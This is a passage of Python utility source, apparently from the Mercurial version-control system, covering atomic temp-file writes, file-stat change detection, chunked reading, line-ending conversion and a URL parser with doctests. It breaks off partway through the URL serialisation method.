1919 1927
1920 1928 Returns the name of the temporary file.
1921 1929 """
1922 1930 d, fn = os.path.split(name)
1923 1931 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1924 1932 os.close(fd)
1925 1933 # Temporary files are created with mode 0600, which is usually not
1926 1934 # what we want. If the original file already exists, just copy
1927 1935 # its mode. Otherwise, manually obey umask.
1928 1936 copymode(name, temp, createmode)
1929 1937 if emptyok:
1930 1938 return temp
1931 1939 try:
1932 1940 try:
1933 1941 ifp = posixfile(name, "rb")
1934 1942 except IOError as inst:
1935 1943 if inst.errno == errno.ENOENT:
1936 1944 return temp
1937 1945 if not getattr(inst, 'filename', None):
1938 1946 inst.filename = name
1939 1947 raise
1940 1948 ofp = posixfile(temp, "wb")
1941 1949 for chunk in filechunkiter(ifp):
1942 1950 ofp.write(chunk)
1943 1951 ifp.close()
1944 1952 ofp.close()
1945 1953 except: # re-raises
1946 1954 try:
1947 1955 os.unlink(temp)
1948 1956 except OSError:
1949 1957 pass
1950 1958 raise
1951 1959 return temp
1952 1960
1953 1961 class filestat(object):
1954 1962 """help to exactly detect change of a file
1955 1963
1956 1964 'stat' attribute is result of 'os.stat()' if specified 'path'
1957 1965 exists. Otherwise, it is None. This can avoid preparative
1958 1966 'exists()' examination on client side of this class.
1959 1967 """
1960 1968 def __init__(self, stat):
1961 1969 self.stat = stat
1962 1970
1963 1971 @classmethod
1964 1972 def frompath(cls, path):
1965 1973 try:
1966 1974 stat = os.stat(path)
1967 1975 except OSError as err:
1968 1976 if err.errno != errno.ENOENT:
1969 1977 raise
1970 1978 stat = None
1971 1979 return cls(stat)
1972 1980
1973 1981 @classmethod
1974 1982 def fromfp(cls, fp):
1975 1983 stat = os.fstat(fp.fileno())
1976 1984 return cls(stat)
1977 1985
1978 1986 __hash__ = object.__hash__
1979 1987
1980 1988 def __eq__(self, old):
1981 1989 try:
1982 1990 # if ambiguity between stat of new and old file is
1983 1991 # avoided, comparison of size, ctime and mtime is enough
1984 1992 # to exactly detect change of a file regardless of platform
1985 1993 return (self.stat.st_size == old.stat.st_size and
1986 1994 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1987 1995 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1988 1996 except AttributeError:
1989 1997 pass
1990 1998 try:
1991 1999 return self.stat is None and old.stat is None
1992 2000 except AttributeError:
1993 2001 return False
1994 2002
1995 2003 def isambig(self, old):
1996 2004 """Examine whether new (= self) stat is ambiguous against old one
1997 2005
1998 2006 "S[N]" below means stat of a file at N-th change:
1999 2007
2000 2008 - S[n-1].ctime < S[n].ctime: can detect change of a file
2001 2009 - S[n-1].ctime == S[n].ctime
2002 2010 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2003 2011 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2004 2012 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2005 2013 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2006 2014
2007 2015 Case (*2) above means that a file was changed twice or more at
2008 2016 same time in sec (= S[n-1].ctime), and comparison of timestamp
2009 2017 is ambiguous.
2010 2018
2011 2019 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2012 2020 timestamp is ambiguous".
2013 2021
2014 2022 But advancing mtime only in case (*2) doesn't work as
2015 2023 expected, because naturally advanced S[n].mtime in case (*1)
2016 2024 might be equal to manually advanced S[n-1 or earlier].mtime.
2017 2025
2018 2026 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2019 2027 treated as ambiguous regardless of mtime, to avoid overlooking
2020 2028 by confliction between such mtime.
2021 2029
2022 2030 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2023 2031 S[n].mtime", even if size of a file isn't changed.
2024 2032 """
2025 2033 try:
2026 2034 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2027 2035 except AttributeError:
2028 2036 return False
2029 2037
2030 2038 def avoidambig(self, path, old):
2031 2039 """Change file stat of specified path to avoid ambiguity
2032 2040
2033 2041 'old' should be previous filestat of 'path'.
2034 2042
2035 2043 This skips avoiding ambiguity, if a process doesn't have
2036 2044 appropriate privileges for 'path'. This returns False in this
2037 2045 case.
2038 2046
2039 2047 Otherwise, this returns True, as "ambiguity is avoided".
2040 2048 """
2041 2049 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2042 2050 try:
2043 2051 os.utime(path, (advanced, advanced))
2044 2052 except OSError as inst:
2045 2053 if inst.errno == errno.EPERM:
2046 2054 # utime() on the file created by another user causes EPERM,
2047 2055 # if a process doesn't have appropriate privileges
2048 2056 return False
2049 2057 raise
2050 2058 return True
2051 2059
2052 2060 def __ne__(self, other):
2053 2061 return not self == other
2054 2062
2055 2063 class atomictempfile(object):
2056 2064 '''writable file object that atomically updates a file
2057 2065
2058 2066 All writes will go to a temporary copy of the original file. Call
2059 2067 close() when you are done writing, and atomictempfile will rename
2060 2068 the temporary copy to the original name, making the changes
2061 2069 visible. If the object is destroyed without being closed, all your
2062 2070 writes are discarded.
2063 2071
2064 2072 checkambig argument of constructor is used with filestat, and is
2065 2073 useful only if target file is guarded by any lock (e.g. repo.lock
2066 2074 or repo.wlock).
2067 2075 '''
2068 2076 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2069 2077 self.__name = name # permanent name
2070 2078 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2071 2079 createmode=createmode)
2072 2080 self._fp = posixfile(self._tempname, mode)
2073 2081 self._checkambig = checkambig
2074 2082
2075 2083 # delegated methods
2076 2084 self.read = self._fp.read
2077 2085 self.write = self._fp.write
2078 2086 self.seek = self._fp.seek
2079 2087 self.tell = self._fp.tell
2080 2088 self.fileno = self._fp.fileno
2081 2089
2082 2090 def close(self):
2083 2091 if not self._fp.closed:
2084 2092 self._fp.close()
2085 2093 filename = localpath(self.__name)
2086 2094 oldstat = self._checkambig and filestat.frompath(filename)
2087 2095 if oldstat and oldstat.stat:
2088 2096 rename(self._tempname, filename)
2089 2097 newstat = filestat.frompath(filename)
2090 2098 if newstat.isambig(oldstat):
2091 2099 # stat of changed file is ambiguous to original one
2092 2100 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2093 2101 os.utime(filename, (advanced, advanced))
2094 2102 else:
2095 2103 rename(self._tempname, filename)
2096 2104
2097 2105 def discard(self):
2098 2106 if not self._fp.closed:
2099 2107 try:
2100 2108 os.unlink(self._tempname)
2101 2109 except OSError:
2102 2110 pass
2103 2111 self._fp.close()
2104 2112
2105 2113 def __del__(self):
2106 2114 if safehasattr(self, '_fp'): # constructor actually did something
2107 2115 self.discard()
2108 2116
2109 2117 def __enter__(self):
2110 2118 return self
2111 2119
2112 2120 def __exit__(self, exctype, excvalue, traceback):
2113 2121 if exctype is not None:
2114 2122 self.discard()
2115 2123 else:
2116 2124 self.close()
2117 2125
2118 2126 def unlinkpath(f, ignoremissing=False, rmdir=True):
2119 2127 """unlink and remove the directory if it is empty"""
2120 2128 if ignoremissing:
2121 2129 tryunlink(f)
2122 2130 else:
2123 2131 unlink(f)
2124 2132 if rmdir:
2125 2133 # try removing directories that might now be empty
2126 2134 try:
2127 2135 removedirs(os.path.dirname(f))
2128 2136 except OSError:
2129 2137 pass
2130 2138
2131 2139 def tryunlink(f):
2132 2140 """Attempt to remove a file, ignoring ENOENT errors."""
2133 2141 try:
2134 2142 unlink(f)
2135 2143 except OSError as e:
2136 2144 if e.errno != errno.ENOENT:
2137 2145 raise
2138 2146
2139 2147 def makedirs(name, mode=None, notindexed=False):
2140 2148 """recursive directory creation with parent mode inheritance
2141 2149
2142 2150 Newly created directories are marked as "not to be indexed by
2143 2151 the content indexing service", if ``notindexed`` is specified
2144 2152 for "write" mode access.
2145 2153 """
2146 2154 try:
2147 2155 makedir(name, notindexed)
2148 2156 except OSError as err:
2149 2157 if err.errno == errno.EEXIST:
2150 2158 return
2151 2159 if err.errno != errno.ENOENT or not name:
2152 2160 raise
2153 2161 parent = os.path.dirname(os.path.abspath(name))
2154 2162 if parent == name:
2155 2163 raise
2156 2164 makedirs(parent, mode, notindexed)
2157 2165 try:
2158 2166 makedir(name, notindexed)
2159 2167 except OSError as err:
2160 2168 # Catch EEXIST to handle races
2161 2169 if err.errno == errno.EEXIST:
2162 2170 return
2163 2171 raise
2164 2172 if mode is not None:
2165 2173 os.chmod(name, mode)
2166 2174
2167 2175 def readfile(path):
2168 2176 with open(path, 'rb') as fp:
2169 2177 return fp.read()
2170 2178
2171 2179 def writefile(path, text):
2172 2180 with open(path, 'wb') as fp:
2173 2181 fp.write(text)
2174 2182
2175 2183 def appendfile(path, text):
2176 2184 with open(path, 'ab') as fp:
2177 2185 fp.write(text)
2178 2186
2179 2187 class chunkbuffer(object):
2180 2188 """Allow arbitrary sized chunks of data to be efficiently read from an
2181 2189 iterator over chunks of arbitrary size."""
2182 2190
2183 2191 def __init__(self, in_iter):
2184 2192 """in_iter is the iterator that's iterating over the input chunks."""
2185 2193 def splitbig(chunks):
2186 2194 for chunk in chunks:
2187 2195 if len(chunk) > 2**20:
2188 2196 pos = 0
2189 2197 while pos < len(chunk):
2190 2198 end = pos + 2 ** 18
2191 2199 yield chunk[pos:end]
2192 2200 pos = end
2193 2201 else:
2194 2202 yield chunk
2195 2203 self.iter = splitbig(in_iter)
2196 2204 self._queue = collections.deque()
2197 2205 self._chunkoffset = 0
2198 2206
2199 2207 def read(self, l=None):
2200 2208 """Read L bytes of data from the iterator of chunks of data.
2201 2209 Returns less than L bytes if the iterator runs dry.
2202 2210
2203 2211 If size parameter is omitted, read everything"""
2204 2212 if l is None:
2205 2213 return ''.join(self.iter)
2206 2214
2207 2215 left = l
2208 2216 buf = []
2209 2217 queue = self._queue
2210 2218 while left > 0:
2211 2219 # refill the queue
2212 2220 if not queue:
2213 2221 target = 2**18
2214 2222 for chunk in self.iter:
2215 2223 queue.append(chunk)
2216 2224 target -= len(chunk)
2217 2225 if target <= 0:
2218 2226 break
2219 2227 if not queue:
2220 2228 break
2221 2229
2222 2230 # The easy way to do this would be to queue.popleft(), modify the
2223 2231 # chunk (if necessary), then queue.appendleft(). However, for cases
2224 2232 # where we read partial chunk content, this incurs 2 dequeue
2225 2233 # mutations and creates a new str for the remaining chunk in the
2226 2234 # queue. Our code below avoids this overhead.
2227 2235
2228 2236 chunk = queue[0]
2229 2237 chunkl = len(chunk)
2230 2238 offset = self._chunkoffset
2231 2239
2232 2240 # Use full chunk.
2233 2241 if offset == 0 and left >= chunkl:
2234 2242 left -= chunkl
2235 2243 queue.popleft()
2236 2244 buf.append(chunk)
2237 2245 # self._chunkoffset remains at 0.
2238 2246 continue
2239 2247
2240 2248 chunkremaining = chunkl - offset
2241 2249
2242 2250 # Use all of unconsumed part of chunk.
2243 2251 if left >= chunkremaining:
2244 2252 left -= chunkremaining
2245 2253 queue.popleft()
2246 2254 # offset == 0 is enabled by block above, so this won't merely
2247 2255 # copy via ``chunk[0:]``.
2248 2256 buf.append(chunk[offset:])
2249 2257 self._chunkoffset = 0
2250 2258
2251 2259 # Partial chunk needed.
2252 2260 else:
2253 2261 buf.append(chunk[offset:offset + left])
2254 2262 self._chunkoffset += left
2255 2263 left -= chunkremaining
2256 2264
2257 2265 return ''.join(buf)
2258 2266
2259 2267 def filechunkiter(f, size=131072, limit=None):
2260 2268 """Create a generator that produces the data in the file size
2261 2269 (default 131072) bytes at a time, up to optional limit (default is
2262 2270 to read all data). Chunks may be less than size bytes if the
2263 2271 chunk is the last chunk in the file, or the file is a socket or
2264 2272 some other type of file that sometimes reads less data than is
2265 2273 requested."""
2266 2274 assert size >= 0
2267 2275 assert limit is None or limit >= 0
2268 2276 while True:
2269 2277 if limit is None:
2270 2278 nbytes = size
2271 2279 else:
2272 2280 nbytes = min(limit, size)
2273 2281 s = nbytes and f.read(nbytes)
2274 2282 if not s:
2275 2283 break
2276 2284 if limit:
2277 2285 limit -= len(s)
2278 2286 yield s
2279 2287
2280 2288 class cappedreader(object):
2281 2289 """A file object proxy that allows reading up to N bytes.
2282 2290
2283 2291 Given a source file object, instances of this type allow reading up to
2284 2292 N bytes from that source file object. Attempts to read past the allowed
2285 2293 limit are treated as EOF.
2286 2294
2287 2295 It is assumed that I/O is not performed on the original file object
2288 2296 in addition to I/O that is performed by this instance. If there is,
2289 2297 state tracking will get out of sync and unexpected results will ensue.
2290 2298 """
2291 2299 def __init__(self, fh, limit):
2292 2300 """Allow reading up to <limit> bytes from <fh>."""
2293 2301 self._fh = fh
2294 2302 self._left = limit
2295 2303
2296 2304 def read(self, n=-1):
2297 2305 if not self._left:
2298 2306 return b''
2299 2307
2300 2308 if n < 0:
2301 2309 n = self._left
2302 2310
2303 2311 data = self._fh.read(min(n, self._left))
2304 2312 self._left -= len(data)
2305 2313 assert self._left >= 0
2306 2314
2307 2315 return data
2308 2316
2309 2317 def readinto(self, b):
2310 2318 res = self.read(len(b))
2311 2319 if res is None:
2312 2320 return None
2313 2321
2314 2322 b[0:len(res)] = res
2315 2323 return len(res)
2316 2324
2317 2325 def unitcountfn(*unittable):
2318 2326 '''return a function that renders a readable count of some quantity'''
2319 2327
2320 2328 def go(count):
2321 2329 for multiplier, divisor, format in unittable:
2322 2330 if abs(count) >= divisor * multiplier:
2323 2331 return format % (count / float(divisor))
2324 2332 return unittable[-1][2] % count
2325 2333
2326 2334 return go
2327 2335
2328 2336 def processlinerange(fromline, toline):
2329 2337 """Check that linerange <fromline>:<toline> makes sense and return a
2330 2338 0-based range.
2331 2339
2332 2340 >>> processlinerange(10, 20)
2333 2341 (9, 20)
2334 2342 >>> processlinerange(2, 1)
2335 2343 Traceback (most recent call last):
2336 2344 ...
2337 2345 ParseError: line range must be positive
2338 2346 >>> processlinerange(0, 5)
2339 2347 Traceback (most recent call last):
2340 2348 ...
2341 2349 ParseError: fromline must be strictly positive
2342 2350 """
2343 2351 if toline - fromline < 0:
2344 2352 raise error.ParseError(_("line range must be positive"))
2345 2353 if fromline < 1:
2346 2354 raise error.ParseError(_("fromline must be strictly positive"))
2347 2355 return fromline - 1, toline
2348 2356
2349 2357 bytecount = unitcountfn(
2350 2358 (100, 1 << 30, _('%.0f GB')),
2351 2359 (10, 1 << 30, _('%.1f GB')),
2352 2360 (1, 1 << 30, _('%.2f GB')),
2353 2361 (100, 1 << 20, _('%.0f MB')),
2354 2362 (10, 1 << 20, _('%.1f MB')),
2355 2363 (1, 1 << 20, _('%.2f MB')),
2356 2364 (100, 1 << 10, _('%.0f KB')),
2357 2365 (10, 1 << 10, _('%.1f KB')),
2358 2366 (1, 1 << 10, _('%.2f KB')),
2359 2367 (1, 1, _('%.0f bytes')),
2360 2368 )
2361 2369
2362 2370 class transformingwriter(object):
2363 2371 """Writable file wrapper to transform data by function"""
2364 2372
2365 2373 def __init__(self, fp, encode):
2366 2374 self._fp = fp
2367 2375 self._encode = encode
2368 2376
2369 2377 def close(self):
2370 2378 self._fp.close()
2371 2379
2372 2380 def flush(self):
2373 2381 self._fp.flush()
2374 2382
2375 2383 def write(self, data):
2376 2384 return self._fp.write(self._encode(data))
2377 2385
2378 2386 # Matches a single EOL which can either be a CRLF where repeated CR
2379 2387 # are removed or a LF. We do not care about old Macintosh files, so a
2380 2388 # stray CR is an error.
2381 2389 _eolre = remod.compile(br'\r*\n')
2382 2390
2383 2391 def tolf(s):
2384 2392 return _eolre.sub('\n', s)
2385 2393
2386 2394 def tocrlf(s):
2387 2395 return _eolre.sub('\r\n', s)
2388 2396
2389 2397 def _crlfwriter(fp):
2390 2398 return transformingwriter(fp, tocrlf)
2391 2399
2392 2400 if pycompat.oslinesep == '\r\n':
2393 2401 tonativeeol = tocrlf
2394 2402 fromnativeeol = tolf
2395 2403 nativeeolwriter = _crlfwriter
2396 2404 else:
2397 2405 tonativeeol = pycompat.identity
2398 2406 fromnativeeol = pycompat.identity
2399 2407 nativeeolwriter = pycompat.identity
2400 2408
2401 2409 if (pyplatform.python_implementation() == 'CPython' and
2402 2410 sys.version_info < (3, 0)):
2403 2411 # There is an issue in CPython that some IO methods do not handle EINTR
2404 2412 # correctly. The following table shows what CPython version (and functions)
2405 2413 # are affected (buggy: has the EINTR bug, okay: otherwise):
2406 2414 #
2407 2415 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2408 2416 # --------------------------------------------------
2409 2417 # fp.__iter__ | buggy | buggy | okay
2410 2418 # fp.read* | buggy | okay [1] | okay
2411 2419 #
2412 2420 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2413 2421 #
2414 2422 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2415 2423 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2416 2424 #
2417 2425 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2418 2426 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2419 2427 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2420 2428 # fp.__iter__ but not other fp.read* methods.
2421 2429 #
2422 2430 # On modern systems like Linux, the "read" syscall cannot be interrupted
2423 2431 # when reading "fast" files like on-disk files. So the EINTR issue only
2424 2432 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2425 2433 # files approximately as "fast" files and use the fast (unsafe) code path,
2426 2434 # to minimize the performance impact.
2427 2435 if sys.version_info >= (2, 7, 4):
2428 2436 # fp.readline deals with EINTR correctly, use it as a workaround.
2429 2437 def _safeiterfile(fp):
2430 2438 return iter(fp.readline, '')
2431 2439 else:
2432 2440 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2433 2441 # note: this may block longer than necessary because of bufsize.
2434 2442 def _safeiterfile(fp, bufsize=4096):
2435 2443 fd = fp.fileno()
2436 2444 line = ''
2437 2445 while True:
2438 2446 try:
2439 2447 buf = os.read(fd, bufsize)
2440 2448 except OSError as ex:
2441 2449 # os.read only raises EINTR before any data is read
2442 2450 if ex.errno == errno.EINTR:
2443 2451 continue
2444 2452 else:
2445 2453 raise
2446 2454 line += buf
2447 2455 if '\n' in buf:
2448 2456 splitted = line.splitlines(True)
2449 2457 line = ''
2450 2458 for l in splitted:
2451 2459 if l[-1] == '\n':
2452 2460 yield l
2453 2461 else:
2454 2462 line = l
2455 2463 if not buf:
2456 2464 break
2457 2465 if line:
2458 2466 yield line
2459 2467
2460 2468 def iterfile(fp):
2461 2469 fastpath = True
2462 2470 if type(fp) is file:
2463 2471 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2464 2472 if fastpath:
2465 2473 return fp
2466 2474 else:
2467 2475 return _safeiterfile(fp)
2468 2476 else:
2469 2477 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2470 2478 def iterfile(fp):
2471 2479 return fp
2472 2480
2473 2481 def iterlines(iterator):
2474 2482 for chunk in iterator:
2475 2483 for line in chunk.splitlines():
2476 2484 yield line
2477 2485
2478 2486 def expandpath(path):
2479 2487 return os.path.expanduser(os.path.expandvars(path))
2480 2488
2481 2489 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2482 2490 """Return the result of interpolating items in the mapping into string s.
2483 2491
2484 2492 prefix is a single character string, or a two character string with
2485 2493 a backslash as the first character if the prefix needs to be escaped in
2486 2494 a regular expression.
2487 2495
2488 2496 fn is an optional function that will be applied to the replacement text
2489 2497 just before replacement.
2490 2498
2491 2499 escape_prefix is an optional flag that allows using doubled prefix for
2492 2500 its escaping.
2493 2501 """
2494 2502 fn = fn or (lambda s: s)
2495 2503 patterns = '|'.join(mapping.keys())
2496 2504 if escape_prefix:
2497 2505 patterns += '|' + prefix
2498 2506 if len(prefix) > 1:
2499 2507 prefix_char = prefix[1:]
2500 2508 else:
2501 2509 prefix_char = prefix
2502 2510 mapping[prefix_char] = prefix_char
2503 2511 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2504 2512 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2505 2513
2506 2514 def getport(port):
2507 2515 """Return the port for a given network service.
2508 2516
2509 2517 If port is an integer, it's returned as is. If it's a string, it's
2510 2518 looked up using socket.getservbyname(). If there's no matching
2511 2519 service, error.Abort is raised.
2512 2520 """
2513 2521 try:
2514 2522 return int(port)
2515 2523 except ValueError:
2516 2524 pass
2517 2525
2518 2526 try:
2519 2527 return socket.getservbyname(pycompat.sysstr(port))
2520 2528 except socket.error:
2521 2529 raise error.Abort(_("no port number associated with service '%s'")
2522 2530 % port)
2523 2531
2524 2532 class url(object):
2525 2533 r"""Reliable URL parser.
2526 2534
2527 2535 This parses URLs and provides attributes for the following
2528 2536 components:
2529 2537
2530 2538 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2531 2539
2532 2540 Missing components are set to None. The only exception is
2533 2541 fragment, which is set to '' if present but empty.
2534 2542
2535 2543 If parsefragment is False, fragment is included in query. If
2536 2544 parsequery is False, query is included in path. If both are
2537 2545 False, both fragment and query are included in path.
2538 2546
2539 2547 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2540 2548
2541 2549 Note that for backward compatibility reasons, bundle URLs do not
2542 2550 take host names. That means 'bundle://../' has a path of '../'.
2543 2551
2544 2552 Examples:
2545 2553
2546 2554 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2547 2555 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2548 2556 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2549 2557 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2550 2558 >>> url(b'file:///home/joe/repo')
2551 2559 <url scheme: 'file', path: '/home/joe/repo'>
2552 2560 >>> url(b'file:///c:/temp/foo/')
2553 2561 <url scheme: 'file', path: 'c:/temp/foo/'>
2554 2562 >>> url(b'bundle:foo')
2555 2563 <url scheme: 'bundle', path: 'foo'>
2556 2564 >>> url(b'bundle://../foo')
2557 2565 <url scheme: 'bundle', path: '../foo'>
2558 2566 >>> url(br'c:\foo\bar')
2559 2567 <url path: 'c:\\foo\\bar'>
2560 2568 >>> url(br'\\blah\blah\blah')
2561 2569 <url path: '\\\\blah\\blah\\blah'>
2562 2570 >>> url(br'\\blah\blah\blah#baz')
2563 2571 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2564 2572 >>> url(br'file:///C:\users\me')
2565 2573 <url scheme: 'file', path: 'C:\\users\\me'>
2566 2574
2567 2575 Authentication credentials:
2568 2576
2569 2577 >>> url(b'ssh://joe:xyz@x/repo')
2570 2578 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2571 2579 >>> url(b'ssh://joe@x/repo')
2572 2580 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2573 2581
2574 2582 Query strings and fragments:
2575 2583
2576 2584 >>> url(b'http://host/a?b#c')
2577 2585 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2578 2586 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2579 2587 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2580 2588
2581 2589 Empty path:
2582 2590
2583 2591 >>> url(b'')
2584 2592 <url path: ''>
2585 2593 >>> url(b'#a')
2586 2594 <url path: '', fragment: 'a'>
2587 2595 >>> url(b'http://host/')
2588 2596 <url scheme: 'http', host: 'host', path: ''>
2589 2597 >>> url(b'http://host/#a')
2590 2598 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2591 2599
2592 2600 Only scheme:
2593 2601
2594 2602 >>> url(b'http:')
2595 2603 <url scheme: 'http'>
2596 2604 """
2597 2605
2598 2606 _safechars = "!~*'()+"
2599 2607 _safepchars = "/!~*'()+:\\"
2600 2608 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2601 2609
2602 2610 def __init__(self, path, parsequery=True, parsefragment=True):
2603 2611 # We slowly chomp away at path until we have only the path left
2604 2612 self.scheme = self.user = self.passwd = self.host = None
2605 2613 self.port = self.path = self.query = self.fragment = None
2606 2614 self._localpath = True
2607 2615 self._hostport = ''
2608 2616 self._origpath = path
2609 2617
2610 2618 if parsefragment and '#' in path:
2611 2619 path, self.fragment = path.split('#', 1)
2612 2620
2613 2621 # special case for Windows drive letters and UNC paths
2614 2622 if hasdriveletter(path) or path.startswith('\\\\'):
2615 2623 self.path = path
2616 2624 return
2617 2625
2618 2626 # For compatibility reasons, we can't handle bundle paths as
2619 2627 # normal URLS
2620 2628 if path.startswith('bundle:'):
2621 2629 self.scheme = 'bundle'
2622 2630 path = path[7:]
2623 2631 if path.startswith('//'):
2624 2632 path = path[2:]
2625 2633 self.path = path
2626 2634 return
2627 2635
2628 2636 if self._matchscheme(path):
2629 2637 parts = path.split(':', 1)
2630 2638 if parts[0]:
2631 2639 self.scheme, path = parts
2632 2640 self._localpath = False
2633 2641
2634 2642 if not path:
2635 2643 path = None
2636 2644 if self._localpath:
2637 2645 self.path = ''
2638 2646 return
2639 2647 else:
2640 2648 if self._localpath:
2641 2649 self.path = path
2642 2650 return
2643 2651
2644 2652 if parsequery and '?' in path:
2645 2653 path, self.query = path.split('?', 1)
2646 2654 if not path:
2647 2655 path = None
2648 2656 if not self.query:
2649 2657 self.query = None
2650 2658
2651 2659 # // is required to specify a host/authority
2652 2660 if path and path.startswith('//'):
2653 2661 parts = path[2:].split('/', 1)
2654 2662 if len(parts) > 1:
2655 2663 self.host, path = parts
2656 2664 else:
2657 2665 self.host = parts[0]
2658 2666 path = None
2659 2667 if not self.host:
2660 2668 self.host = None
2661 2669 # path of file:///d is /d
2662 2670 # path of file:///d:/ is d:/, not /d:/
2663 2671 if path and not hasdriveletter(path):
2664 2672 path = '/' + path
2665 2673
2666 2674 if self.host and '@' in self.host:
2667 2675 self.user, self.host = self.host.rsplit('@', 1)
2668 2676 if ':' in self.user:
2669 2677 self.user, self.passwd = self.user.split(':', 1)
2670 2678 if not self.host:
2671 2679 self.host = None
2672 2680
2673 2681 # Don't split on colons in IPv6 addresses without ports
2674 2682 if (self.host and ':' in self.host and
2675 2683 not (self.host.startswith('[') and self.host.endswith(']'))):
2676 2684 self._hostport = self.host
2677 2685 self.host, self.port = self.host.rsplit(':', 1)
2678 2686 if not self.host:
2679 2687 self.host = None
2680 2688
2681 2689 if (self.host and self.scheme == 'file' and
2682 2690 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2683 2691 raise error.Abort(_('file:// URLs can only refer to localhost'))
2684 2692
2685 2693 self.path = path
2686 2694
2687 2695 # leave the query string escaped
2688 2696 for a in ('user', 'passwd', 'host', 'port',
2689 2697 'path', 'fragment'):
2690 2698 v = getattr(self, a)
2691 2699 if v is not None:
2692 2700 setattr(self, a, urlreq.unquote(v))
2693 2701
2694 2702 @encoding.strmethod
2695 2703 def __repr__(self):
2696 2704 attrs = []
2697 2705 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2698 2706 'query', 'fragment'):
2699 2707 v = getattr(self, a)
2700 2708 if v is not None:
2701 2709 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2702 2710 return '<url %s>' % ', '.join(attrs)
2703 2711
2704 2712 def __bytes__(self):
2705 2713 r"""Join the URL's components back into a URL string.
2706 2714
2707 2715 Examples:
2708 2716
2709 2717 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2710 2718 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2711 2719 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2712 2720 'http://user:pw@host:80/?foo=bar&baz=42'
2713 2721 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2714 2722 'http://user:pw@host:80/?foo=bar%3dbaz'
2715 2723 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2716 2724 'ssh://user:pw@[::1]:2200//home/joe#'
2717 2725 >>> bytes(url(b'http://localhost:80//'))
2718 2726 'http://localhost:80//'
2719 2727 >>> bytes(url(b'http://localhost:80/'))
2720 2728 'http://localhost:80/'
2721 2729 >>> bytes(url(b'http://localhost:80'))
2722 2730 'http://localhost:80/'
2723 2731 >>> bytes(url(b'bundle:foo'))
2724 2732 'bundle:foo'
2725 2733 >>> bytes(url(b'bundle://../foo'))
2726 2734 'bundle:../foo'
2727 2735 >>> bytes(url(b'path'))
2728 2736 'path'
2729 2737 >>> bytes(url(b'file:///tmp/foo/bar'))
2730 2738 'file:///tmp/foo/bar'
2731 2739 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2732 2740 'file:///c:/tmp/foo/bar'
2733 2741 >>> print(url(br'bundle:foo\bar'))
2734 2742 bundle:foo\bar
2735 2743 >>> print(url(br'file:///D:\data\hg'))
2736 2744 file:///D:\data\hg
2737 2745 """
2738 2746 if self._localpath:
2739 2747 s = self.path
2740 2748 if self.scheme == 'bundle':
2741 2749 s = 'bundle:' + s
2742 2750 if self.fragment:
2743 2751 s += '#' + self.fragment
2744 2752 return s
2745 2753
2746 2754 s = self.scheme + ':'
2747 2755 if self.user or self.passwd or self.host:
2748 2756 s += '//'
2749 2757 elif self.scheme and (not self.path or self.path.startswith('/')
2750 2758 or hasdriveletter(self.path)):
2751 2759 s += '//'
2752 2760 if hasdriveletter(self.path):
2753 2761 s += '/'
2754 2762 if self.user:
2755 2763 s += urlreq.quote(self.user, safe=self._safechars)
2756 2764 if self.passwd:
2757 2765 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2758 2766 if self.user or self.passwd:
2759 2767 s += '@'
2760 2768 if self.host:
2761 2769 if not (self.host.startswith('[') and self.host.endswith(']')):
2762 2770 s += urlreq.quote(self.host)
2763 2771 else:
2764 2772 s += self.host
2765 2773 if self.port:
